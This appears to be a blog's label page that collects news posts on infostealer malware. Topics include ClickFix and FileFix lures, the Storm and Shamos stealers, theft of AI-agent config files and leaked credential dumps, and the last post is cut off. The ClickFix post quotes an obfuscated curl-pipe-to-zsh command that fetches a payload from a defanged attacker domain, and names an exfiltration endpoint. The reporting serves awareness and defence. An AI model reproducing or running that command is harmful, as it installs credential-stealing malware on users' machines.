Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Infostealer. Show all posts
Ukraine cyber police
browser session theft Cybercrime Investigation Infostealer malware stolen credentials Telegram cybercrime Ukraine cyber police

Ukrainian Cyber Police Uncover Alleged Infostealer Operation Linked to 18-Year-Old Suspect

 


Ukrainian cyber police, in collaboration with U.S. law enforcement agencies, have identified an 18-year-old resident of Odesa who is suspected of operating an infostealer malware campaign that targeted customers of a California-based online retailer.

Authorities allege that between 2024 and 2025, the suspect used information-stealing malware to compromise users’ devices and obtain browser session data along with account login credentials.

Infostealers are a widely used form of malicious software designed to collect sensitive information from infected systems. The stolen data can include passwords, browser cookies, session tokens, cryptocurrency wallet details, and payment information, which are often exploited for fraud, account takeovers, and illicit resale.

Investigators reported that the operation affected approximately 28,000 customer accounts. Cybercriminals allegedly exploited around 5,800 of those accounts to make unauthorized purchases worth nearly $721,000. The attacks also resulted in direct financial losses of about $250,000, including chargeback-related expenses.

“To carry out the criminal scheme, the attackers used 'infostealer' malware that secretly infected users’ devices, collected login credentials, and transmitted them to servers controlled by the attackers,” the police says.

“The information was then processed and sold through specialized online resources and Telegram bots.”

According to law enforcement officials, the suspect also conducted cryptocurrency transactions with accomplices involved in the scheme.

The session information referenced by investigators reportedly included session tokens, which can allow unauthorized access to online accounts without requiring passwords. In certain situations, these tokens may even enable attackers to bypass multi-factor authentication (MFA) protections.

Police believe the 18-year-old played a key role in the operation by managing the infrastructure used to process, distribute, and exploit stolen session data.

During the investigation, officers carried out searches at two residences connected to the suspect. Authorities seized mobile phones, computer hardware, bank cards, digital storage devices, and additional electronic evidence believed to be linked to the cybercrime activity.

Investigators stated that the evidence includes access to platforms used for selling stolen information, tools for managing compromised accounts, server activity records, and accounts on cryptocurrency exchange services.

While authorities have identified the suspect and collected significant evidence, the official announcement does not indicate that an arrest has been made. This suggests investigators may still be gathering additional information before filing formal charges.

Read more »
unauthorised access
browser data Credential Theft Cybersecurity Google Infostealer malware Sensitive data Storm unauthorised access

New Malware “Storm” Steals Browser Data and Hijacks Sessions Without Passwords

 



A newly identified infostealer called Storm has emerged on underground cybercrime forums in early 2026, signalling a change in how attackers steal and use credentials. Priced at under $1,000 per month, the malware collects browser-stored data such as login credentials, session cookies, and cryptocurrency wallet information, then covertly transfers the data to attacker-controlled servers where it is decrypted outside the victim’s system.

This change becomes clearer when compared to earlier techniques. Traditionally, infostealers decrypted browser credentials directly on infected machines by loading SQLite libraries and accessing local credential databases. Because of this, endpoint security tools learned to treat such database access as one of the strongest indicators of malicious activity.

The approach began to break down after Google Chrome introduced App-Bound Encryption in version 127 in July 2024. This mechanism tied encryption keys to the browser environment itself, making local decryption exponentially more difficult. Initial bypass attempts relied on injecting into browser processes or exploiting debugging protocols, but these techniques still generated detectable traces.

Storm avoids this entirely by skipping local decryption. Instead, it extracts encrypted browser files and quietly sends them to attacker infrastructure, removing the behavioural signals that endpoint tools typically rely on. It extends this model by supporting both Chromium-based browsers and Gecko-based browsers such as Firefox, Waterfox, and Pale Moon, whereas tools like StealC V2 still handle Firefox data locally.

The data collected includes saved passwords, session cookies, autofill entries, Google account tokens, payment card details, and browsing history. This combination gives attackers everything required to rebuild authenticated sessions remotely. In practice, a single compromised employee browser can provide direct access to SaaS platforms, internal systems, and cloud environments without triggering any password-based alerts.

Storm also automates session hijacking. Once decrypted, credentials and cookies appear in the attacker’s control panel. By supplying a valid Google refresh token along with a geographically matched SOCKS5 proxy, the platform can silently recreate the victim’s active session.

This technique aligns with earlier research by Varonis Threat Labs. Its Cookie-Bite study showed that stolen Azure Entra ID session cookies can bypass multi-factor authentication, granting persistent access to Microsoft 365. Similarly, its SessionShark analysis demonstrated how phishing kits intercept session tokens in real time to defeat MFA protections. Storm packages these methods into a commercial subscription service.

Beyond credentials, the malware collects files from user directories, extracts session data from applications like Telegram, Signal, and Discord, and targets cryptocurrency wallets through browser extensions and desktop applications. It also gathers system information and captures screenshots across multiple monitors. Most operations run in memory, reducing the likelihood of detection.

Its infrastructure design adds resilience. Operators connect their own virtual private servers to Storm’s central system, routing stolen data through infrastructure they control. This setup limits the impact of takedowns, as enforcement actions are more likely to affect individual operator nodes rather than the core service.

Storm supports multi-user operations, allowing teams to divide responsibilities such as log access, malware build generation, and session restoration. It also automatically categorises stolen credentials by service, with visible rules for platforms including Google, Facebook, Twitter/X, and cPanel, helping attackers prioritise targets.

At the time of analysis, the control panel displayed 1,715 log entries linked to locations including India, the United States, Brazil, Indonesia, Ecuador, and Vietnam. While it is unclear whether all entries represent real victims or test data, variations in IP addresses, internet service providers, and data volumes suggest ongoing campaigns.

The logs include credentials associated with platforms such as Google, Facebook, Twitter/X, Coinbase, Binance, Blockchain.com, and Crypto.com. Such information often feeds into underground credential marketplaces, enabling account takeovers, fraud, and more targeted intrusions.

Storm is offered through a tiered pricing model: $300 for a seven-day trial, $900 per month for standard access, and $1,800 per month for a team licence supporting up to 100 operators and 200 builds. Use of an additional crypter is required. Notably, once deployed, malware builds continue operating even after a subscription expires, allowing ongoing data collection.

Security researchers view Storm as part of a broader evolution in credential theft. By shifting decryption to remote servers, attackers avoid detection mechanisms designed to identify on-device activity. At the same time, session cookie theft is increasingly replacing password theft as the primary objective.

The data collected by such tools often marks the beginning of further attacks, including logins from unusual locations, lateral movement within networks, and unauthorised access patterns.


Indicators of compromise include:

Alias: StormStealer

Forum ID: 221756

Registration date: December 12, 2025

Current version: v0.0.2.0 (Gunnar)

Build details: Developed in C++ (MSVC/msbuild), approximately 460 KB in size, targeting Windows systems


This advent of Storm underlines how cybercriminal tools are becoming more advanced, automated, and difficult to detect, requiring organisations to strengthen monitoring of sessions, user behaviour, and access patterns rather than relying solely on traditional credential protection methods.


Read more »
Malware attacks
ClickFix ClickFix Attack Cyber Attacks data security Data Theft Infostealer Infostealer Malware leaked sensitive data Mac OS Malware attacks

Infiniti Stealer Targets Mac Users with ClickFix Social Engineering Attack

 

Not stopping at typical malware tricks, Infiniti Stealer targets Macs using clever social manipulation instead of system flaws. Security firm Malwarebytes uncovered the operation, highlighting how it dodges standard protection tools. Once inside, the software slips under the radar easily. What stands out is its reliance on tricking users, not breaking through digital walls. 

Starting off, attackers rely on a technique called ClickFix, tricking people into running harmful software without realizing it. Instead of clear warnings, users land on fake websites designed to look real - usually through deceptive emails or infected links. These pages imitate trusted security checks used by Cloudflare, copying their layout closely. A common "I am not a robot" checkbox shows up first. Then comes misleading directions hidden inside what seems like normal steps. Though simple at glance, each piece nudges victims toward unintended actions.  

Spotlight pops up when users start the process, guiding them toward finding Terminal. Once there, they run an unfamiliar line of code by pasting it directly. What seems like a small task hides its real intent - execution happens under human control, so security tools often stand down. The trick works because actions led by people rarely trigger alarms, even if those actions carry risk. Hidden behind normal behavior, the command slips through defenses without raising flags. 

Execution triggers installation of Infiniti Stealer onto the system. Though built in Python, it becomes a standalone macOS executable through compilation with Nuitka. Because of this conversion, detection by security software weakens. Analysis grows more difficult when facing such repackaged threats instead of standard interpreted scripts. Stealth improves simply by changing how the code runs.  

Once installed, it starts pulling private details from the compromised device. Things like stored login credentials, web history including cookies, snapshots of screens appear among what gets gathered. From there, the data flows toward remote machines managed by hackers - opening doors to hijacked accounts or stolen identities. What leaves the machine often fuels more invasive misuse downstream. What stands out is how this campaign signals a change in the way attackers operate. 

Moving away from technical flaws or harmful file attachments, they now lean heavily on manipulating people’s actions - especially by abusing their confidence in everyday website features such as CAPTCHA challenges. When unsure, steer clear of directions from unknown online sources - particularly if they involve running Terminal commands. Real authentication processes never ask people to enter scripts into core system utilities. 

When signs of infection appear, stop using the device without delay. Security professionals suggest changing credentials through an unaffected system right away. Access tokens tied to the infected hardware should be invalidated promptly. A different machine must handle these updates to prevent further exposure.
Read more »
Malware Attack
AI Agent AI agent data theft Cyber Security Data Theft Infostealer Infostealer Malware Malware Attack

Infostealer Malware Targets OpenClaw AI Agent Files to Steal API Keys and Authentication Tokens

 

Now appearing in threat reports, OpenClaw — a local AI assistant that runs directly on personal devices — has rapidly gained popularity. Because it operates on users’ machines, attackers are shifting focus to its configuration files. Recent malware infections have been caught stealing setup data containing API keys, login tokens, and other sensitive credentials, exposing private access points that were meant to remain local. 

Previously known as ClawdBot or MoltBot, OpenClaw functions as a persistent assistant that reads local files, logs into email and messaging apps, and interacts with web services. Since it stores memory and configuration details on the device itself, compromising it can expose deeply personal and professional data. As adoption grows across home and workplace environments, saved credentials are becoming attractive targets. 

Cybersecurity firm Hudson Rock identified what it believes is the first confirmed case of infostealer malware extracting OpenClaw configuration data. The incident marks a shift in tactics: instead of stealing only browser passwords, attackers are now targeting AI assistant environments that store powerful authentication tokens. According to co-founder and CTO Alon Gal, the infection likely involved a Vidar infostealer variant, with stolen data traced to February 13, 2026. 

Researchers say the malware did not specifically target OpenClaw. Instead, it scanned infected systems broadly for files containing keywords like “token” or “private key.” Because OpenClaw stores data in a hidden folder with those identifiers, its files were automatically captured. Among the compromised files, openclaw.json contained a masked email, workspace path, and a high-entropy gateway authentication token that could enable unauthorized access or API impersonation. 

The device.json file stored public and private encryption keys used for pairing and signing, meaning attackers with the private key could mimic the victim’s device and bypass security checks. Additional files such as soul.md, AGENTS.md, and MEMORY.md outlined the agent’s behavior and stored contextual data including logs, messages, and calendar entries. Hudson Rock concluded that the combination of stolen tokens, keys, and memory data could potentially allow near-total digital identity compromise.

Experts expect infostealers to increasingly target AI systems as they become embedded in professional workflows. Separately, Tenable disclosed a critical flaw in Nanobot, an AI assistant inspired by OpenClaw. The vulnerability, tracked as CVE-2026-2577, allowed remote hijacking of exposed instances but was patched in version 0.13.post7. 

Security professionals warn that as AI tools gain deeper access to personal and corporate systems, protecting configuration files is now as critical as safeguarding passwords. Hidden setup files can carry risks equal to — or greater than — stolen login credentials.
Read more »
Mac OS
Claude Claude AI risk ClickFix ClickFix Attacks Cyber Security Google Ads Infostealer Infostealer Malware Mac OS

ClickFix Campaigns Exploit Claude Artifacts to Target macOS Users with Infostealers

 

One out of every hundred Mac users searching online might now face hidden risks. Instead of helpful tools, some find traps disguised as guides - especially when looking up things like "DNS resolver" or "HomeBrew." Behind these results, attackers run silent operations using fake posts linked to real services. Notably, they borrow content connected to Claude, spreading it through paid search ads on Google. Each click can lead straight into their hands. Two separate versions of this scheme are already circulating. Evidence suggests more than ten thousand people followed the harmful steps without knowing. Most never realized what was taken. Quiet but widespread, the pattern reveals how easily trust gets hijacked in plain sight. 

Beginning with public posts shaped by Anthropic’s AI, a Claude artifact emerges when someone shares output from the system online. Hosted on claude.ai, such material might include scripts, how-tos, or fragments of working code - open for viewing through shared URLs. During recent ClickFix operations, deceptive search entries reroute people toward counterfeit versions of these documents. Instead of genuine help, visitors land on forged Medium pieces mimicking Apple's support site. From there, directions appear telling them to insert command-line strings straight into Terminal. Though it feels harmless at first glance, that single step triggers the start of compromise. 

The technical execution of these attacks involves two primary command variants. One common method utilizes an `echo` command, which is then piped through `base64 -D | zsh` for execution. The second variant employs a `curl` command to covertly fetch and execute a remote script: `true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh`. Upon successful execution of either command, the MacSync infostealer is deployed onto the macOS system. This potent malware is specifically engineered to exfiltrate a wide array of sensitive user data, including crucial keychain information, browser data, and cryptocurrency wallet details. 

One way attackers stay hidden involves disguising their traffic as ordinary web requests. A suspicious Claude guide, spotted by Moonlock Lab analysts, reached more than 15,600 users - an indicator of wide exposure. Instead of sending raw information, the system bundles stolen content neatly into a ZIP file, often stored temporarily under `/tmp/osalogging.zip`. This package then travels outward through an HTTP POST directed at domains such as `a2abotnet[.]com/gate`. Behind the scenes, access relies on fixed credentials: a preset token and API key baked directly into the code. For extra stealth, it mimics a macOS-based browser's digital fingerprint during exchanges. When uploads stall, the archive splits into lighter segments, allowing repeated tries - up to eight attempts occur if needed. Once delivery finishes, leftover files vanish instantly, leaving minimal evidence behind.  

This latest operation looks much like earlier efforts where hackers used chat-sharing functions in major language models - like ChatGPT and Grok - to spread the AMOS infostealer. What makes the shift toward targeting Claude notable is how attackers keep expanding their methods across different AI systems. Because of this, users need to stay highly alert, especially when it comes to running Terminal instructions they do not completely trust. One useful check, pointed out by Kaspersky analysts, means pausing first to ask the same assistant about any command’s intent and risk before carrying it out.
Read more »
Malware Attack
Data Breach Database Breach Database Compromised Infostealer Infostealer Malware Malware Attack

Unsecured Database Exposes 149 Million Logins Linked to Infostealer Malware Operations

 

Appearing without warning on the internet, a massive collection of personal login details became reachable to any passerby. This trove - spanning about 96 gigabytes - included close to 150 million distinct credentials gathered from various sources. Not shielded by locks or scrambled coding, its contents lay fully exposed. Inside, endless spreadsheets paired emails with user handles, access codes, plus entry points to accounts. Examination showed evidence of widespread digital theft, driven by aggressive software designed to harvest private information. Such leaks reveal how deeply automated attacks now penetrate everyday online activity. 

Credentials came from people across the globe, tied to many different websites. Access information showed up for big social networks, romance apps, subscription video sites, games, and money-handling services. Among them: login pairs for digital currency storage, bank entry points, and systems linked to payment cards. A mix like that points not to one hacked business but likely stems from software designed to gather passwords automatically.  

What stood out most was the appearance of login details tied to government-backed email addresses in various nations. Though these accounts do not always grant entry to critical infrastructure, basic official credentials might still be exploited - serving as tools for focused scams or fake identities. Starting from minor access points, attackers could work their way deeper into secure environments. The level of danger shifts with each individual's privileges; when higher-access .gov logins fall into the wrong hands, consequences can stretch well beyond a single agency. 

Appearing first in the analysis was a database organized much like those seen in infostealer activities. Keylog results sat alongside extra details - hostnames flipped intentionally to sort thefts by target and origin. Though built on hashes, every record carried its own distinct ID, likely meant to prevent repeats while easing bulk sorting tasks. From this setup emerges something functional: a system shaped for gathering, handling, even passing along login information. Last noted - the traits match what supports credential trafficking behind the scenes. 

With unclear responsibility for the database, reporting went straight to the hosting company. Still, fixing the issue dragged on - weeks passed, with multiple alerts needed before entry was blocked. While delays continued, more data kept flowing in, expanding the volume of sensitive records exposed. Who controlled the system, how long it stayed open online, or whether others harvested its contents stays unanswered. One wrong move here leads to serious trouble. 

When hackers get full logins alongside active URLs, they run automated break-ins across many accounts - this raises chances of stolen identities, fake messages that seem real, repeated fraud, and unauthorized access. Personal habits emerge through used platforms, painting a clearer picture of who someone is online, which deepens threats to private data and future safety. 

Midway through this event lies proof: stealing login details now operates like mass production, fueled by weak cloud setups. Because information-harvesting software grows sharper every month, staying protected means doing basics well - shielding devices, practicing careful habits online, using separate codes everywhere, while adding extra identity checks. Found gaps here reveal something odd at first glance - not just legitimate systems fail from poor setup, but illegal networks do too; when they collapse, masses of people get caught unaware, their private pieces scattered without knowing a breach ever happened.
Read more »
Password
Credentials Data Breach Data Leak Gmail Google Infostealer Password

Gmail Credentials Appear in Massive 183 Million Infostealer Data Leak, but Google Confirms No New Breach




A vast cache of 183 million email addresses and passwords has surfaced in the Have I Been Pwned (HIBP) database, raising concern among Gmail users and prompting Google to issue an official clarification. The newly indexed dataset stems from infostealer malware logs and credential-stuffing lists collected over time, rather than a fresh attack targeting Gmail or any other single provider.


The Origin of the Dataset

The large collection, analyzed by HIBP founder Troy Hunt, contains records captured by infostealer malware that had been active for nearly a year. The data, supplied by Synthient, amounted to roughly 3.5 terabytes, comprising nearly 23 billion rows of stolen information. Each entry typically includes a website name, an email address, and its corresponding password, exposing a wide range of online accounts across various platforms.

Synthient’s Benjamin Brundage explained that this compilation was drawn from continuous monitoring of underground marketplaces and malware operations. The dataset, referred to as the “Synthient threat data,” was later forwarded to HIBP for indexing and public awareness.


How Much of the Data Is New

Upon analysis, Hunt discovered that most of the credentials had appeared in previous breaches. Out of a 94,000-record sample, about 92 percent matched older data, while approximately 8 percent represented new and unseen credentials. This translates to over 16 million previously unrecorded email addresses, fresh data that had not been part of any known breaches or stealer logs before.

To test authenticity, Hunt contacted several users whose credentials appeared in the sample. One respondent verified that the password listed alongside their Gmail address was indeed correct, confirming that the dataset contained legitimate credentials rather than fabricated or corrupted data.


Gmail Accounts Included, but No Evidence of a Gmail Hack

The inclusion of Gmail addresses led some reports to suggest that Gmail itself had been breached. However, Google has publicly refuted these claims, stating that no new compromise has taken place. According to Google, the reports stem from a misunderstanding of how infostealer databases operate, they simply aggregate previously stolen credentials from different malware incidents, not from a new intrusion into Gmail systems.

Google emphasized that Gmail’s security systems remain robust and that users are protected through ongoing monitoring and proactive account protection measures. The company said it routinely detects large credential dumps and initiates password resets to protect affected accounts.

In a statement, Google advised users to adopt stronger account protection measures: “Reports of a Gmail breach are false. Infostealer databases gather credentials from across the web, not from a targeted Gmail attack. Users can enhance their safety by enabling two-step verification and adopting passkeys as a secure alternative to passwords.”


What Users Should Do

Experts recommend that individuals check their accounts on Have I Been Pwned to determine whether their credentials appear in this dataset. Users are also advised to enable multi-factor authentication, switch to passkeys, and avoid reusing passwords across multiple accounts.

Gmail users can utilize Google’s built-in Password Manager to identify weak or compromised passwords. The password checkup feature, accessible from Chrome’s settings, can alert users about reused or exposed credentials and prompt immediate password changes.

If an account cannot be accessed, users should proceed to Google’s account recovery page and follow the verification steps provided. Google also reminded users that it automatically requests password resets when it detects exposure in large credential leaks.


The Broader Security Implications

Cybersecurity professionals stress that while this incident does not involve a new system breach, it reinforces the ongoing threat posed by infostealer malware and poor password hygiene. Sachin Jade, Chief Product Officer at Cyware, highlighted that credential monitoring has become a vital part of any mature cybersecurity strategy. He explained that although this dataset results from older breaches, “credential-based attacks remain one of the leading causes of data compromise.”

Jade further noted that organizations should integrate credential monitoring into their broader risk management frameworks. This helps security teams prioritize response strategies, enforce adaptive authentication, and limit lateral movement by attackers using stolen passwords.

Ultimately, this collection of 183 million credentials serves as a reminder that password leaks, whether new or recycled, continue to feed cybercriminal activity. Continuous vigilance, proactive password management, and layered security practices remain the strongest defenses against such risks.


Read more »
Phishing Attack
ClickFix Cyber Attacks CyberThreat fake alerts FileFix Infostealer Infostealer Malware Malware Attack Meta Phishing Attack

FileFix Attack Uses Fake Meta Suspensions to Spread StealC Malware

 

A new cyber threat known as the FileFix attack is gaining traction, using deceptive tactics to trick users into downloading malware. According to Acronis, which first identified the campaign, hackers are sending fake Meta account suspension notices to lure victims into installing the StealC infostealer. Reported by Bleeping Computer, the attack relies on social engineering techniques that exploit urgency and fear to convince targets to act quickly without suspicion. 

The StealC malware is designed to extract sensitive information from multiple sources, including cloud-stored credentials, browser cookies, authentication tokens, messaging platforms, cryptocurrency wallets, VPNs, and gaming accounts. It can also capture desktop screenshots. Victims are directed to a fake Meta support webpage available in multiple languages, warning them of imminent account suspension. The page urges users to review an “incident report,” which is disguised as a PowerShell command. Once executed, the command installs StealC on the victim’s device. 

To execute the attack, users are instructed to copy a path that appears legitimate but contains hidden malicious code and subtle formatting tricks, such as extra spaces, making it harder to detect. Unlike traditional ClickFix attacks, which use the Windows Run dialog box, FileFix leverages the Windows File Explorer address bar to execute malicious commands. This method, attributed to a researcher known as mr.fox, makes the attack harder for casual users to recognize. 

Acronis has emphasized the importance of user awareness and training, particularly educating people on the risks of copying commands or paths from suspicious websites into system interfaces. Recognizing common phishing red flags—such as urgent language, unexpected warnings, and suspicious links—remains critical. Security experts recommend that users verify account issues by directly visiting official websites rather than following embedded links in unsolicited emails. 

Additional protective measures include enabling two-factor authentication (2FA), which provides an extra security layer even if login credentials are stolen, and ensuring that devices are protected with up-to-date antivirus solutions. Advanced features such as VPNs and hardened browsers can also reduce exposure to such threats. 

Cybersecurity researchers warn that both FileFix and its predecessor ClickFix are likely to remain popular among attackers until awareness becomes widespread. As these techniques evolve, sharing knowledge within organizations and communities is seen as a key defense. At the same time, maintaining strong cyber hygiene and securing personal devices are essential to reduce the risk of falling victim to these increasingly sophisticated phishing campaigns.
Read more »
Shamos
ClickFix Attacks Cookie Spider Infostealer Mac Users malware Shamos

New Shamos Malware Targets Mac Users Through Fake Tech Support Sites

 

Cybersecurity researchers have unearthed a new Mac-targeting malware called Shamos that deceives users through fake troubleshooting guides and repair solutions. This information-stealing malware, developed by the cybercriminal organization "COOKIE SPIDER," represents a variant of the previously known Atomic macOS Stealer (AMOS).

Modus operandi

The malware spreads through ClickFix attacks, which utilize malicious advertisements and counterfeit GitHub repositories to trick victims. Attackers create deceptive websites such as mac-safer[.]com and rescue-mac[.]com that appear to offer legitimate macOS problem-solving assistance. These sites instruct users to copy and paste Terminal commands that supposedly fix common system issues. 

However, these commands actually decode Base64-encoded URLs and retrieve malicious Bash scripts from remote servers. The scripts capture user passwords, download the Shamos executable, and use system tools like 'xattr' and 'chmod' to bypass Apple's Gatekeeper security feature. 

Data theft capabilities

Once installed, Shamos performs comprehensive data collection targeting multiple sensitive areas. The malware searches for cryptocurrency wallet files, Keychain credentials, Apple Notes content, and browser-stored information. It employs anti-virtual machine commands to avoid detection in security sandboxes and uses AppleScript for system reconnaissance.

All stolen data gets compressed into an archive file named 'out.zip' before transmission to the attackers via curl commands. When operating with administrator privileges, Shamos establishes persistence by creating a Plist file in the LaunchDaemons directory, ensuring automatic execution during system startup. 

CrowdStrike's monitoring has detected Shamos attempting infections across more than 300 environments globally since June 2025. The security firm has also observed instances where attackers deployed additional malicious components, including fake Ledger Live cryptocurrency applications and botnet modules. 

Safety measures

Security experts strongly advise Mac users to avoid executing any online commands they don't fully understand. Users should be particularly cautious with GitHub repositories, as the platform hosts numerous malicious projects designed to infect unsuspecting individuals.

For legitimate macOS assistance, users should bypass sponsored search results and instead consult Apple Community forums or the built-in Help system (Cmd + Space → "Help"). ClickFix attacks have proven highly effective across various platforms, appearing in TikTok videos, fake captchas, and bogus Google Meet error messages, making user awareness crucial for prevention.
Read more »
PayPal Data Breach
Credential Stuffing Cybercrime Forum Dark Web Markets Infostealer malware Multi Factor Authentication Password Security PayPal Data Breach

PayPal Password Leak Puts Millions of Users on High Alert

 


It has been reported that millions of PayPal accounts have been traded on underground forums, which has raised a new wave of alarm in the ever-evolving landscape of cybercrime. Using the moniker “Chucky_BF”, a hacker announcing the availability of a dataset of 15.8 million PayPal accounts for the startlingly low price of $750 USD has advertised what he claims is a dataset of 15.8 million PayPal accounts. 

There has been widespread discussion across social media about the trove, which allegedly contains a 1.1 gigabyte text file that stores plaintext email and password combinations, making them accessible and ready for immediate use for malicious purposes. According to the hacker, the records he created cover a wide range of email providers, such as Gmail, Yahoo, Hotmail, among others, suggesting that the victims are spread around the globe. 

A concern, however, may be the inclusion of PayPal-specific login URLs and mobile URLs, which appear to be structured in such a way as to facilitate an automated exploit. The stolen credentials are organized along with direct links to PayPal sign-in portals that you can use to sign into PayPal—for example, the /signin, /signup, /connect, and the Android application URIs—in a way that makes them easy for cybercriminals to deploy as a toolkit. 

According to screenshots of the offer being circulated on the internet, there are rows of raw email:password:url entries, an information dump format commonly used in underground credential dumps. Even though the authenticity of the data has not been confirmed, due to its structured nature and low asking price, concerns have been raised that the data could rapidly be acquired by cybercriminals eager to exploit any portion of the data.

Those who would want to be attackers could use a dataset like this as the foundation for credential stuffing attacks, phishing campaigns, or even large-scale fraud against PayPal users across multiple countries if they wanted to make such a purchase. 

Not just because of the numbers, but because PayPal is a trusted platform for millions of businesses and individuals throughout the world, the hacker’s bold claims have caught the attention of the world. The central player in the global ecosystem of digital payments, even unverified reports of a massive leak raise immediate questions regarding the potential financial loss, the reputational damage, and the security of user identities in an environment that is becoming increasingly hostile. 

It is important to note, however, that while the alleged dataset has sparked headlines, experts emphasise that a thorough analysis of the situation is necessary. Neither PayPal nor any of its subsidiaries have ever been directly breached by large-scale attackers who have taken millions of user records from the company's systems. This distinction is crucial because previous incidents related to PayPal—such as one involving around 35,000 users—were attributed to credential stuffing or the use of previously stolen data, not to flaws within PayPal's own infrastructure. 

If the claims made by "Chucky_BF" are accurate, it appears as though the dataset has more likely come from an infostealer malware infection than from PayPal's servers themselves. A malicious program, known as an infostealer malware infection, infects computers and mobile devices and can often be delivered through phishing emails, malicious downloads, or compromised websites in order to gain access to personal data. 

It has been shown that the malware is silently extracting stored login information, browser history, cookies, and autofill information from a system once inside, then sending this information to cybercriminals. This theory is supported by the fact that the hacker shared samples that included PayPal login URLs and Android URIs. In contrast to the centralised dump that PayPal's systems may have produced, this dataset may have gathered stolen logs from compromised personal devices all over the world, carefully restructured to appear as if they were stolen from PayPal. 

The practice of rebranding or repackaging stolen data is common within cybercrime markets, where rebranding can enhance a person's perception of how valuable it is. Recent discoveries strengthen this belief. Researchers identified 184 million login credentials, including unique usernames and passwords, that had been exposed through a misconfigured cloud server in May of 2025, according to cybersecurity researcher Jeremiah Fowler. 

In the same way that PayPal credentials are believed to have been retrieved via infostealer malware rather than through a direct company breach, those credentials are almost certainly the result of infostealer malware. Information-stealing malware is extremely destructive. In Hudson Rock's research, it has been determined that such malware is not only readily available on the dark web but has been successfully infiltrating not just individual users, but also critical institutions, according to Hudson Rock's research. 

It was found that employees of some of the most sensitive organisations in the United States had been infected by the virus, including the Pentagon, Lockheed Martin, Honeywell, branches of the military, and even the FBI, according to the analysis. Taking advantage of infostealers highlights that even institutions that have robust security frameworks can be compromised, which underscores how vulnerable consumers may be to similar threats that they are not aware of or are unable to protect themselves from. 

PayPal users face immediate and multifaceted risks if the data is fabricated or recycled, millions of real credentials are still in circulation despite the fact that some of the data may be fabricated or recycled. The information that cybercriminals possess can be used to launch credential stuffing attacks in which stolen email-password pairs are tested across multiple platforms in search of accounts whose credentials are reusable. Because most individuals recycle the same login information across a wide range of financial, e-commerce, and social platforms, a compromise of a single PayPal account can lead to an overall e-commerce invasion. 

Besides direct financial theft, there are also other risks associated with structured datasets such as this, including phishing campaigns that can be created to mimic PayPal login pages and lure victims into providing updated credentials. This data can also be used for social engineering purposes by attracting individuals to tailored scams that exploit their trust in financial institutions. Depending on the extent of the data, there could be a loss of revenue, fraud, and recovery costs of billions of dollars, depending on whether it was authentic. 

As of the time of writing, PayPal has not confirmed or denied the authenticity of the dataset. HackRead.com, which reported the sale, was also unable to independently confirm the claims. I have contacted the company to get their opinion, but I anticipate that any confirmation or rebuttal of the statement would affect the level of response its global user base will require. However, vigilance has not been abandoned by cybersecurity experts in cases where unverified leaks make headlines. 

In cases where unverified leaks make headlines, it would be prudent for users to assume the worst and take proactive measures to protect themselves. Analysts recommend that all PayPal users immediately: Reset their PayPal password to a strong, unique one. Enable Multi-Factor Authentication (MFA), ideally through an authenticator app instead of SMS. 

Check linked email accounts for unusual login activity. Use password managers to avoid reusing credentials across multiple platforms. Run updated antivirus and anti-malware scans on devices to detect possible infections. Monitor financial transactions closely, enabling alerts for any suspicious payments. Consider identity theft protection services, particularly for users who conduct significant business via PayPal. 

Experts also stress the importance of an overall digital hygiene program. As infostealer malware has emerged as one of the most potent and pervasive forms of cybersecurity, experts advise updating software regularly, being cautious when browsing, and being sceptical when receiving unsolicited emails or downloading files. 

A significant risk reduction can be achieved for businesses, especially those relying heavily on PayPal for e-commerce, by implementing endpoint protection solutions and employee training programs. The alleged theft of PayPal credentials serves as a stark reminder of the fragile balance between trust and e-commerce in general. 

In spite of the fact that PayPal may not have suffered any direct breaches, the reputational fallout of its brand and its users still lingers, especially when the company's brand is compromised. With the rise of cybercrime marketplaces, stolen or recycled data will likely continue to be retrieved, repackaged, and sold to eager customers for the foreseeable future. 

The only way to stay ahead of attackers is to practice proactive security, so the only way to protect yourself is to stay ahead of them. As a result, whether the 15.8 million credentials that were advertised by “Chucky_BF” represented a real new breach, a compilation of stolen logs, or simply a rebranded dump of older leaks, the underlying issue remains the same: in today's digital economy, personal data is a commodity and vigilance is not optional - it is the price of taking part. 

The lesson from this episode is clear: your password should not be changed after confirmation, but now rather than later. Considering the ever-expanding digital landscape, incidents such as the alleged sale of PayPal credentials underscore a more important truth that security is no longer just an optional layer of protection, but a fundamental responsibility of everyone involved in the online economy today. In addition to immediate countermeasures like password resets or multifactor authentication, users must adopt a mindset of continuous cyber-resilience in addition to these immediate countermeasures. 

Digital accounts should be treated in the same way as physical assets in order to prevent them from being compromised. It is essential to pay close attention to the evolving nature of threats and take the time to utilise tools that go beyond basic security hygiene to detect compromised credentials early, such as hardware security keys, zero-trust authentication models, and regular dark web monitoring. 

There is no doubt that in an environment where a brand's reputation is fragile, cybersecurity awareness is integral to a business's daily operations, especially for small businesses that rely heavily on platforms like PayPal. By embedding cybersecurity awareness into everyday operations, businesses are not only protecting revenues but also strengthening customer trust. 

A proactive approach to layered defences can ultimately be a source of peace of mind for the individual, who is confident that he or she will not be perpetually vulnerable to unseen adversaries while transacting, communicating, and operating online. Cybersecurity may seem complicated at first glance, but it is the discipline of foresight, vigilance, and accountability that ensures digital trust remains strong in the long run.
Read more »
Piracy
Cyber Crime Infostealer Pakistani Scammer Piracy

Pakistani Cybercriminals Turn Piracy Against Pirates in $4M Malware Scheme

 

A massive cybercrime operation based in Pakistan has been exposed after running a sophisticated infostealer malware campaign for five years, generating over $4 million by targeting software pirates. 

Operation details

The criminal network, primarily operating from Bahawalpur and Faisalabad, functioned like a multi-level marketing scheme but distributed malicious code instead of legitimate products. According to research, the group used search engine optimisation poisoning and forum posts to advertise pirated software such as Adobe After Effects and Internet Download Manager. 

Victims were redirected to malicious WordPress sites where infostealer malware, including Lumma Stealer, Meta Stealer, and AMOS was hidden within password-protected archives. The operation utilised disposable domains to mask the true source of infections, making detection more difficult. 

Financial infrastructure

The scheme's backbone consisted of two Pay-Per-Install (PPI) networks: InstallBank and SpaxMedia (later rebranded as Installstera). Over 5,200 affiliates operated at least 3,500 sites, earning payments for each successful malware installation or download. Payments were processed primarily through Payoneer and Bitcoin. 

The scale was enormous, with records showing 449 million clicks and more than 1.88 million installations during the documented period. Long-running domains proved most profitable, with a small fraction generating the majority of revenue. 

Downfall and exposure

